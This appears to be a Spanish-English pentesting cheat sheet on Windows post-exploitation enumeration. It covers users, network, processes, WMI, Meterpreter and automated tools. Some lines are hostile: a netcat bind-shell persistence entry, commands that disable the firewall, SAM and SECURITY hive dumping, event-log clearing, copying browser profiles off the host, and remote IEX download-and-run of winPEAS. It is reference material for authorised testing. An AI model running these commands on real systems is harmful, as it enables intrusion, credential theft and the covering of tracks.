Windows Enum
Enumeración Básica
Hostname
OS Nmae (Windows 7,8, etc)
OS Build & Service Pack (Windows 7 SP1 7600)
Os Architecture (x64/x86)
Paquetes instalados (Para posibles elevaciones de servicios)
Comandos manuales
#info
hostname
systeminfo
#Hot Fix installations
wmic qfe get Caption,Description,HotFixID,InstalledOn
#Eula
type c:\\Windows\\System32\eula.txt
#Query state of Firewall, Disable Firewall, Allow a Service Through
#Query state of firewall:
netsh firewall show state
#Disable firewall
netsh.exe firewall set opmode mode=disable profile=all
#Allow service through firewall
netsh.exe firewall set portopening tcp 123 MYSERVICE enable all
netsh.exe firewall set allowedprogram C:\MYPROGRAM.exe
HKLM\software\microsoft\windows\ currentversion\run –d ‘C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe’ –v netcat
netsh firewall set allowedprogram c:\nc.exe allow_nc ENABLE
#Query current user and privilege information
whoami
whoami /all
whoami /user
whoami /groups
whoami /priv
[Users]
net users: list users
For more info on a user:
net user (for local user)
net user /domain (for a domain user)
#View domain admins:
net group "Domain Admins" /domain
#View name of domain controller:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DC
Add user:
net users /add
#Add user to local administrators group:
net localgroup administrators /add
#Delete a user:
net users username /delete /domain
#Change user's password:
net users
[Accounts & Groups]
net accounts
net accounts /domain
net logalgroup administrators
net localgroup administrators /dmain
net group "domain Admins" /domain
net group "Enterprise Admins" /domain
net view /localgroup
net localgroup Administrators
net localgroup /Domain
gpresult: view group policy
gupdate: update group policy
gpresult /z
[Network and misc information]
systeminfo: lists information about system
ipconfig/all: Query ip configuation
ipconfig /displaydns
# Prints machines routing table
route print
# Lists all systems current in the machine's ARP table
arp -a
# Query server information
nslookup
# Displays protocol stats and current TCP/IP connections using NetBIOS over TCP/IP
nbtstat
# Query info about RDP sessions
qwinsta
# Query session information
net session
net time \computername # (Shows the time of target computer)
# view shared resources on network
net share
#[Query current drives on system]
fsutil fsinfo drives
#[Grab SAM and SYSTEM files]
type "C:/windows/repair/SAM"
type "C:/windows/repair/SYSTEM"
#[Tasks]
tasklist /svc: lists running processes
taskkill /PID /F : forcibly kill task
taskkill taskkill /PID xxx taskkill /IM name of process to be terminated can be used to kill all processes with same name
tasklist /V /S computername: Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount
qprocess*: Similar to tasklist but easier to read
at: Query current scheduled tasks
schtasks: Query scheduled tasks that your current user has access to see.
schtasks /query /fo csv /v > %TEMP%
[Netstat]
netstat -ano : to see what services are running on what ports
netstat -bano
netstat -r
netstat -na | findstr :443
[Query information about server and workstation, Workstation domain name and Logon domain]
net config server
net config workstation
[Change drive to different drive letter]
ex change to D:/ directory and list it's contents:
d: & dir
cd /d d: & dir
dir \computername\share_or_admin_share (dir list a remote directory)
[Cat contents of file located in D:/ directory]
cd /d & type d:\blah\blah
[net view]
net view /domain[:DomainName]
net view \computerName
[Services]
View list processes started upon startup
net start
wmic startup get caption,command
[Query, Stop/Start/Pause Installed Services]
sc query state= all
sc query
sc
[Remote System Access]
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net share \computername
tasklist /V /S computername
qwinsta /SERVER:computername
qprocess /SERVER:computername
*[WMI]
wmic bios
wmic qfe
wmic qfe get hotfixid (This gets patches IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create “process_name” (executes a program)
wmic process where name=”process_name” call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? for gets help ! )
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)
[Reg Command]
reg save HKLM\Security security.hive (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)=
reg add [\TargetIPaddr] [RegDomain][ \Key ]
reg export [RegDomain][Key] [FileName]
reg import [FileName ]
reg query [\TargetIPaddr] [RegDomain][ Key ] /v [Valuename!] (you can to add /s for recurse all values )
[Deleting Logs]
wevtutil el (list logs)
wevtutil cl
[Uninstalling Software]
wmic proud get name /value: gets software names
wmic product where name="XXX": call uninstall /Interactive:Off: unintalss software
[Permissions]
icacls
Grant full access over directory and encompassing folders and files:
icacls "C:\windows" /grant Administrator:F /T
icacls "C:\" /grant "nt authority\system": F /T
[Net use]
net use: Map network shares
net use \computername (maps IPC$ which does not show up as a drive)
net use \computername /user:DOMAINNAME\username password ○ (maps IPC$ under another username)
[Mount a remote share with the rights of the current user]:
net use K: \\
dir K:
[Enable remote desktop]
reg add "HKLM\System\CurrentControlSet\Control\TermServer" /v fDenyTSConnections /t REG_DWORD /f
net session: list session information
[Other useful Commands]
pkgmgr usefull /iu :"Package"
pkgmgr usefull /iu :"TellnetServer": install telnet service
pkgmgr /iu:"TelnetClient"
rundll32.exe user32.dll, LockWorkStation: locks the screen
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>
xcopy /C /S %appdata%\Mozilla\Firefox\Profiles*.sqlite \your_box
type "C:\documents and settings\administrator\userdata\index.dat"
type %WINDIR%\System32\drivers\etc\hosts: view contents of hosts files
type "c:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials"
cd "C:/Documents and settings\administrator\userdata" & dir
type "c:\Documents and Settings\Administrator\Desktop\UserMysql.txt"
type "c:\Documents and Settings\Administrator\Application Data\MySQL\mysqlx_user_connections.xml"
type "C:\documents and settings\administrator\userdata\index.dat"Meterpreter
#Basic Info
getuid
sysinfo
shell
Enumeración de Usuarios
Enumerar el usuario actual y sus privilegios, enumerar la cantidad de usuarios existentes en el sistema y otros grupos y miembros de esos grupos.
Comandos manuales
# Current User
whoami
# Privilegies
whoami /priv
# List Users
query user
net users
# Info about any user
net user <name>
# List groups
net localgroup
net localgroup <name>
#Listado de dispisitivos montados
meterpreter> show_mount Meterpreter
getprivs
use post/windows/gather/enum_logged_on_users
> use 0
> sessions
> set session 1
> rumEnumeración de Red
Buscamos, IP actual, network adapter, Internal networks, servicios TCP/UDP corriendo, otros host en la red, la tabla de routeo, estado del firewall de windows
Comandos manuales
# Get Current adapters
ipconfig
ipconfig /all
# Prunt route table
route print
# Lista las computadoras cercanas
arp -a
# Listar las conecciones
netstat -ano
# Firefal configuration
netsh firewall show state
netsh advfirewall firewall show allprofilesEnumeración de procesos
Es importante saber sobre el sistema, enumerar procesos permite migrar de proceso, hacer otro tipo de ataques como process injection y explotar mas vulnerabilidades, explotar una escalación de privilegios .
Comandos
# list windows services [Servicios en background]
net start
wmic service list breief
# Listado de procesos y servicios
tasklist /SVC
#Listar las tareas programadas Simple
schtasks /query /fo LIST
# Mayor información
schtasks /query /fo LIST /v
# Sirve para lista aquellas tareas que esten mal configuradas para encontrar una posible forma de escalación de privilegiosMeterpreter
# list proces
> ps
# Migrar proceso
> migrate <PID>
# Get PID of process name
> pgrep explorer.exeAutomatizar enumeración
JWAS
Just Another Windows (Enum) Script
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txtwinPEAS
powershell -ExecutionPolicy Bypass "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"Metasploit
Una vez ganado sesión remota con meterpreter
## Enumeración de privilegios
> use post/windows/gather/win_privs
> sessions
> set session 1
> run
# List users login
> use post/windows/gather/enum_logged_on_users
> set session 1
> run
# Listado de aplicaciones instaladas
> use post/windows/gather/enum_applications
> set session 1
> run
# Check if are in vm
> use post/windows/gather/checkvm
> set session 1
> run
# Listado de modulos disponiblles
> search post/windows/Para mas comandos y metodologías en Windows se recomienda la lectura de Pentesting AD
Bibliografia
Última actualización
